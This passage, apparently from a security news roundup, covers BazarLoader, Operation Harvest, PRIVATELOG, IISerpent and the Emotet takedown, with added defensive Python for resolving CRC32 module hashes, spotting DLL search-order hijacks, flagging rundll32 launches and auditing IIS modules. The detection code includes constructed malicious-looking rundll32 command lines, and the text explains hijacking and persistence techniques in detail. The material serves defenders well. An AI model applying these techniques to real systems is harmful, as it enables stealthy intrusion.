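Two checks fall out of the description above for an analyst or defender: resolving the hardcoded CRC32 values back to module names (hash the names a sample is likely to import and look for matches), and listing which imports of an executable can actually be satisfied from its own directory. This is an added example, not CrowdStrike's or the malware's code; the import table, hash list and directory listing are constructed, and it assumes standard zlib CRC-32 over the name as it appears in the IAT, trying lower- and upper-case variants because malware often normalises case first. One caveat the search-order description leaves out: DLLs on the KnownDLLs list are always mapped from System32 regardless of what sits next to the executable, so they are excluded here.

```python
import zlib
from typing import Dict, Iterable, List, Set, Tuple


def crc32_name(name: str) -> int:
    """Standard CRC-32 (zlib/IEEE) of an ASCII module name as a 32-bit value."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def resolve_hashes(hardcoded: Iterable[int], dictionary: Iterable[str]) -> Dict[int, str]:
    """Map hash values recovered from a sample back to module names by hashing
    every candidate name in its original, lower-case and upper-case forms."""
    table: Dict[int, str] = {}
    for name in dictionary:
        for variant in (name, name.lower(), name.upper()):
            table[crc32_name(variant)] = name
    return {h: table[h] for h in hardcoded if h in table}


def hijackable_imports(iat_modules: Iterable[str], known_dlls: Set[str]) -> List[str]:
    """Imports the loader will look for in the application directory first:
    everything except KnownDLLs (always resolved from System32) and modules
    referenced by an explicit path."""
    result = []
    for module in iat_modules:
        low = module.lower()
        if low in known_dlls or "\\" in low or "/" in low:
            continue
        result.append(module)
    return result


def shadowed_imports(hijackable: Iterable[str], app_dir_files: Iterable[str]) -> List[str]:
    """Hijackable imports that already have a same-named file next to the
    executable: the on-disk state a DoppelPaymer-style stager drop produces."""
    present = {f.lower() for f in app_dir_files}
    return [m for m in hijackable if m.lower() in present]


# Constructed data: not ProcessHacker's real import table, not DoppelPaymer's
# real hash list, and only a subset of KnownDLLs. On a live system the list is
# read from HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.
SAMPLE_IAT = ["KERNEL32.dll", "USER32.dll", "VERSION.dll", "dbghelp.dll", "WTSAPI32.dll"]
SAMPLE_KNOWN_DLLS = {"kernel32.dll", "user32.dll", "ntdll.dll", "advapi32.dll"}
SAMPLE_APP_DIR = ["ProcessHacker.exe", "kprocesshacker.sys", "version.dll"]
SAMPLE_HASHES = [crc32_name("version.dll"), crc32_name("wtsapi32.dll"), 0xDEADBEEF]


def analyze() -> Tuple[Dict[int, str], List[str], List[str]]:
    """Run all three checks over the constructed data."""
    names = resolve_hashes(SAMPLE_HASHES, SAMPLE_IAT)
    hijackable = hijackable_imports(SAMPLE_IAT, SAMPLE_KNOWN_DLLS)
    shadowed = shadowed_imports(hijackable, SAMPLE_APP_DIR)
    return names, hijackable, shadowed


if __name__ == "__main__":
    names, hijackable, shadowed = analyze()
    print("resolved hashes:", {hex(h): n for h, n in names.items()})
    print("hijackable imports:", hijackable)
    print("already shadowed on disk:", shadowed)
```

A `shadowed` result that contains a system DLL name next to a third-party executable is exactly the artifact to alert on; the same check applies to the prntvpt.dll and PrintConfig.dll pairing described for PRIVATELOG further down this page. If the hash dictionary yields no matches, the sample probably uses a non-standard CRC32 (different polynomial, seed or final XOR), and the routine has to be lifted from the binary instead.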

BazarLoader's Arrival and Delivery Vectors now Include Compromised Installers and ISO


While the number of BazarLoader detections increased in the third quarter, two new delivery methods have been added to the list of mechanisms threat actors use for data theft and ransomware. One approach uses trojanized software installers in which BazarLoader is bundled with genuine products. The second approach places a Windows shortcut (LNK) and a dynamic link library (DLL) payload inside an ISO file. The United States has been found to have the highest number of BazarLoader attacks.

Researchers detected tainted versions of the VLC and TeamViewer software bundled with BazarLoader, according to reports. While the original delivery technique has yet to be discovered, the use of these packages may be part of a larger social engineering campaign aimed at convincing individuals to download and run the infected installers. A BazarLoader executable is dropped and executed when the installers run. This is also one of the most noticeable differences from recent BazarLoader arrival approaches, which relied on dynamic link libraries (DLLs).

Meanwhile, a distribution technique based on ISO files has been uncovered, in which the BazarLoader DLL is launched via the DLL and LNK files included in the ISO. The LNK file uses a folder icon to fool the user into double-clicking it, allowing the BazarLoader DLL to be launched. The "EnterDLL" export function, which was recently used by BazarLoader, is then called. Rundll32.exe loads the malicious DLL and connects to the C&C server before injecting itself into a suspended MS Edge process.
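The chain above (shortcut double-clicked from the shell, rundll32.exe loading a DLL from a mounted ISO or user-writable path, a named export) is visible in ordinary process-creation telemetry such as Sysmon event 1 or Windows event 4688. The following is an added detection example, not Trend Micro's or any vendor's rule: it parses a rundll32 command line into DLL path and entry point, and flags executions whose parent is explorer.exe (an interactive launch, as from an LNK) and whose DLL lives outside the trusted system and program directories. The events are constructed; the trusted-prefix list and the explorer.exe heuristic are assumptions to tune for your environment.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (fields any EDR or Sysmon log provides)."""
    parent_image: str
    image: str
    command_line: str


# Directories from which rundll32 loading a DLL is normal. Assumption: adjust
# for your own software inventory (e.g. add a vendor's install directory).
TRUSTED_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# rundll32 syntax: <image> <dll>[,<entry>|<whitespace><entry>] [args]
# Group 1 = quoted DLL path, group 2 = unquoted DLL path, group 3 = entry point
# (a name or #ordinal).
RUNDLL32_CMD = re.compile(
    r'^\s*(?:"[^"]*"|\S+)\s+(?:"([^"]+)"|([^\s,]+))[\s,]+([#\w]+)'
)


def parse_rundll32(command_line: str) -> Optional[Tuple[str, str]]:
    """Return (dll_path, entry_point) from a rundll32 command line, or None."""
    match = RUNDLL32_CMD.match(command_line)
    if not match:
        return None
    dll = match.group(1) or match.group(2)
    return dll, match.group(3)


def find_suspicious(events: List[ProcessEvent]) -> List[Tuple[str, str, str]]:
    """Return (parent_name, dll_path, entry_point) for rundll32 launches that
    come from the interactive shell and load a DLL from an untrusted location."""
    hits = []
    for ev in events:
        if not ev.image.lower().endswith("\\rundll32.exe"):
            continue
        parsed = parse_rundll32(ev.command_line)
        if parsed is None:
            continue
        dll, entry = parsed
        in_trusted_dir = dll.lower().startswith(TRUSTED_PREFIXES)
        from_shell = ev.parent_image.lower().endswith("\\explorer.exe")
        if from_shell and not in_trusted_dir:
            hits.append((ev.parent_image.rsplit("\\", 1)[-1], dll, entry))
    return hits


# Constructed events, not from a real incident. E: stands in for a mounted ISO.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" E:\Documents\report.dll,EnterDLL'),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
                 r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\x.dll",EnterDLL'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Notepad++\notepad++.exe",
                 r'"C:\Program Files\Notepad++\notepad++.exe" notes.txt'),
]

if __name__ == "__main__":
    for parent, dll, entry in find_suspicious(SAMPLE_EVENTS):
        print(f"suspicious rundll32: parent={parent} dll={dll} entry={entry}")
```

The rule deliberately does not key on the export name: "EnterDLL" is trivial for the operators to rename, whereas "rundll32 launched by the shell against a DLL on removable media or under the user profile" survives that change. Pair it with the subsequent behaviour the article describes, a rundll32 process opening a child msedge.exe in a suspended state, for a higher-confidence signal.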

As threat actors change their attack techniques to avoid detection, the number of arrival mechanism variations used in BazarLoader campaigns continues to rise. Both techniques are significant and still work despite their lack of novelty, because single detection methods have limitations.

While the use of compromised installers has been seen with other malware, the large file size can still pose a problem for detection systems, such as sandboxes, that apply file size constraints. LNK files used as shortcuts, on the other hand, will almost certainly be obfuscated by the additional layers placed between the shortcut and the malicious files.

BazarLoader will continue to evolve as a standalone information stealer, an initial access malware-as-a-service (MaaS) for other malware operators, and a secondary payload distribution mechanism for even more destructive attacks such as modern ransomware. Against unknown threats, security teams must deploy multi-layered systems capable of pattern recognition and behavior monitoring, while making the monitoring and tracking of known threats more visible using known indicators.

Years-Long Attack by Chinese-Linked APT Groups Discovered by McAfee


A cyber-attack that had been sitting on the target organization's network for years stealing data was discovered during a McAfee investigation into a suspected malware infection. The sophisticated threat actors utilized a mix of known and novel malware tools in the attack, called Operation Harvest, to infiltrate the victim's IT infrastructure, exfiltrate data, and avoid detection, according to the investigators. McAfee researchers were able to narrow down the list of suspects to two advanced persistent threat (APT) nation-state groups with ties to China during the course of the two-month investigation. 

“Operation Harvest has been a long-term operation whereby an adversary maintained access for multiple years to exfiltrate data,” Christiaan Beek, lead scientist and senior principal engineer for the Enterprise Office of the CTO at McAfee, wrote in a report. 

“The exfiltrated data would have either been part of an intellectual property theft for economic purposes and/or would have provided insights that would be beneficial in case of military interventions. The adversaries made use of techniques very often observed in this kind of attack but also used distinctive new backdoors or variants of existing malware families,” Beek added. 

According to the forensic investigation, the actor gained initial access by compromising the victim's web server, which was then used to maintain persistence and to store the tools needed to gather information about the victim's network and to move laterally and execute files.

Both the way the unique encryption function in the custom backdoor operates and the code used in the DLL are almost identical to methods attributed to the Winnti malware family; the adversaries used techniques commonly seen in this type of attack, but also distinctive new backdoors or variants of existing malware families. According to the findings, the adversary was looking to steal proprietary knowledge for military or intellectual property/manufacturing reasons.

To figure out who the perpetrators were, McAfee investigators mapped out the MITRE ATT&CK Enterprise techniques, added the tools used, and compared the information against previous technique data. They found four groups that shared the same tactics and sub-techniques, then used a chart to narrow the suspects down to APT27 and APT41.

“After mapping out all data, TTP’s [tactics, techniques, and procedures] etc., we discovered a very strong overlap with a campaign observed in 2019/2020,” Beek wrote. “A lot of the (in-depth) technical indicators and techniques match. Also putting it into perspective, and over time, it demonstrates the adversary is adapting skills and evolving the tools and techniques being used.”

PRIVATELOG Relies on Common Log File System to Evade Detection


Researchers have revealed data about a new malware family that uses the Common Log File System (CLFS) to conceal a second-stage payload in registry transaction files in order to avoid detection. The malware, named PRIVATELOG, and its installer, STASHLOG, were discovered by FireEye's Mandiant Advanced Practices team. Details about the threat actor's identity and motivations are still unknown. 

CLFS (Common Log File System) is a general-purpose logging subsystem for producing high-performance transaction logs that is available to both kernel-mode and user-mode applications. It debuted with Windows Server 2003 R2 and has been included in subsequent Windows operating systems. CLFS can be used for event logging as well as data logging. TxF (Transactional NTFS) and TxR (Transactional Registry) use CLFS to save transactional state changes before committing a transaction. No built-in Windows utility can inspect the binary log files that CLFS creates.

CLFS's goal, like that of any other transactional logging system, is to record the series of steps required for a particular activity so that they can later be accurately replayed to commit the transaction to secondary storage, or undone if necessary.

Although the malware has not yet been found in real-world attacks against consumer environments or seen launching any second-stage payloads, Mandiant believes PRIVATELOG may still be in development, might be the work of a researcher, or could be used in a highly targeted attack.

“Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files. This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions. This is similar in nature to malware which may rely, for example, on the Windows Registry or NTFS Extended Attributes to hide their data, which also provide locations to store and retrieve binary data with the Windows API,” explained Mandiant researchers.

PRIVATELOG and STASHLOG have features that allow malicious software to remain undetected on infected machines, such as the use of obfuscated strings and control flow techniques that are specifically designed to make static analysis difficult. 

Mandiant researchers examined a PRIVATELOG sample that is an un-obfuscated 64-bit DLL named prntvpt.dll, containing exports similar to those found in legitimate prntvpt.dll files. PRIVATELOG expects to be loaded by PrintConfig.dll through DLL search order hijacking. Mandiant provides YARA rules to detect PRIVATELOG and STASHLOG, as well as their variants.

IISerpent Trojan Manipulates Search Engine Optimization


Security researchers recently had to cope with a huge number of malware attacks targeting the Internet Information Services (IIS) component. The IISerpent Trojan is the most recent malware family to be added to the list. 

The malware is installed as a Microsoft IIS add-on. After that, it intercepts HTTP requests and traffic, but there's a catch. This IIS malware works differently from other IIS malware that uses the same position to steal credentials and private data, such as the IISpy backdoor. It only goes to work when it recognizes requests from specific search engines, rather than ordinary HTTP traffic. Search engines have crawlers that scour the Web on a regular basis for pages to index or re-index. Pages on the same domain can link to one another, and crawlers use specific algorithms to determine a page's search engine ranking.

Buying adverts or implementing search engine optimization (SEO) strategies are two legitimate ways to improve page ranking in search engine result pages; however, not all digital marketers follow the rules. SEO-boosting practices that contravene webmaster guidelines, such as loading pages with unrelated keywords or buying backlinks to improve a website's reputation, are referred to as unethical SEO (historically known as black hat SEO).

IISerpent is a native IIS module, implemented as a C++ DLL and configured in the %windir%\system32\inetsrv\config\ApplicationHost.config file. IISerpent ensures both persistence and execution because all IIS modules are loaded by the IIS Worker Processes (w3wp.exe) and used to handle inbound HTTP requests.

Like all native IIS modules, IISerpent exports a function called RegisterModule, which performs module initialization. Its event handlers (methods of the module class, inherited from CHttpModule, that are called on certain server events) hide the underlying harmful functionality. IISerpent's module class overrides the OnBeginRequest and OnSendResponse methods, so the malware's handlers are called every time the IIS server begins processing a new inbound HTTP request and every time it sends the response buffer.
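Because every native module has to be registered in ApplicationHost.config before w3wp.exe will load it, the configuration file itself is the first place to hunt. The following is an added example, not ESET's or the malware's code: it parses a constructed ApplicationHost.config fragment, lists every native module under `<globalModules>`, and flags any whose DLL image does not live under %windir%\System32\inetsrv, noting whether the `<modules>` section also enables it. The fragment, the module names and the suspicious path are constructed; the inetsrv-only location rule is an assumption that some legitimate third-party modules (installed elsewhere on purpose) will violate, so treat findings as a review list rather than verdicts.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed ApplicationHost.config fragment. The real file is found at
# %windir%\system32\inetsrv\config\ApplicationHost.config and is far larger;
# the module names and the C:\Windows\Temp path here are made up.
SAMPLE_CONFIG = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\System32\inetsrv\loghttp.dll" />
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="CacheModule" image="C:\Windows\Temp\cache.dll" />
      <add name="RequestFilteringModule" image="%windir%\System32\inetsrv\modrqflt.dll" />
    </globalModules>
  </system.webServer>
  <location path="" overrideMode="Allow">
    <system.webServer>
      <modules>
        <add name="HttpLoggingModule" />
        <add name="StaticFileModule" />
        <add name="CacheModule" />
      </modules>
    </system.webServer>
  </location>
</configuration>
"""


def audit_native_modules(config_xml: str, windir: str = r"C:\Windows") -> List[Tuple[str, str, str]]:
    """Return (module_name, expanded_image_path, status) for every native module
    whose DLL is outside %windir%\\System32\\inetsrv. status is "enabled" when
    the module is also listed under <modules>, otherwise "registered-only"."""
    root = ET.fromstring(config_xml)
    expected_dir = (windir.rstrip("\\") + "\\system32\\inetsrv\\").lower()

    # Modules actually activated for request processing.
    enabled = {
        add.get("name", "")
        for modules in root.iter("modules")
        for add in modules.findall("add")
    }

    findings = []
    for global_modules in root.iter("globalModules"):
        for add in global_modules.findall("add"):
            name = add.get("name", "")
            image = add.get("image", "")
            # Expand the two variables IIS itself uses for the Windows directory.
            expanded = image.replace("%windir%", windir).replace("%SystemRoot%", windir)
            normalized = expanded.lower().replace("/", "\\")
            if not normalized.startswith(expected_dir):
                status = "enabled" if name in enabled else "registered-only"
                findings.append((name, expanded, status))
    return findings


if __name__ == "__main__":
    for name, image, status in audit_native_modules(SAMPLE_CONFIG):
        print(f"{status:15} {name:25} {image}")
```

On a live server `appcmd list modules` gives the same inventory without parsing XML, and every DLL on the list should additionally be checked for a valid Authenticode signature (for example with PowerShell's Get-AuthenticodeSignature) and compared with the modules actually loaded into each w3wp.exe process, since a module that handles OnBeginRequest and OnSendResponse has to be mapped there.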

Because everything appears normal to the webmaster and users (all the 'magic' happens in the background), these attacks are extremely difficult to detect. Of course, a quick look at a backlink analysis or at network traffic data will suggest that something is amiss.

The worst thing about the IISerpent Trojan's attack is that the websites that are attacked could lose their good SEO ranking. This is possible because search engine crawlers will quickly notice the link between the original page and the counterfeit website, which will usually result in SEO penalties.

International Law Enforcement Takes Down Emotet Malware in a Joint Operation


Emotet, one of the most dangerous email spam botnets in recent history, is being wiped out today from all infected devices with the help of a malware module delivered in January by law enforcement. The botnet's takedown is the result of an international law enforcement action that allowed investigators to take control of the Emotet's servers and disrupt the malware's operation. 

This specifically designed malware code forced the Emotet to self-destruct on Sunday, April 25. The code was distributed at the end of January to Emotet-infected computers by the malware's command-and-control (C2) infrastructure, which had just been seized in an international law enforcement operation.

After the takedown operation, law enforcement pushed a new configuration to active Emotet infections so that the malware would begin to use command and control servers controlled by the Bundeskriminalamt, Germany's federal police agency. Law enforcement then distributed a new Emotet module in the form of a 32-bit EmotetLoader.dll to all infected systems that automatically uninstalled the malware on Sunday.

“The EmotetLoader.dll is a 32-bit DLL responsible for removing the malware from all infected computers. This will ensure that all services related to Emotet will be deleted, the run key in the Windows registry is removed – so that no more Emotet modules are started automatically – and all running Emotet processes are terminated,” Mariya Grozdanova, a threat intelligence analyst at Redscan, stated.

Emotet was particularly nasty in that it spread mainly via malicious attachments in spam emails and, once installed, could bring in additional malware: infected machines were rented out to criminals to install things like ransomware and code that drained victims' online bank accounts. Computer security firm Digital Shadows highlighted the extent of the Emotet epidemic and said its removal is an overall win for everyone.

Paul Robichaux, senior director of product management at IT forensics firm Quest, stated to The Register: “These kinds of large-scale, coordinated attacks and global botnets are too big for individual organizations to resolve entirely themselves, and leaving individual companies to clean them up themselves is a legitimate national security problem. However, the fact that law enforcement is on the case is no excuse to let your guard down. You still need to focus on securing your own environments.”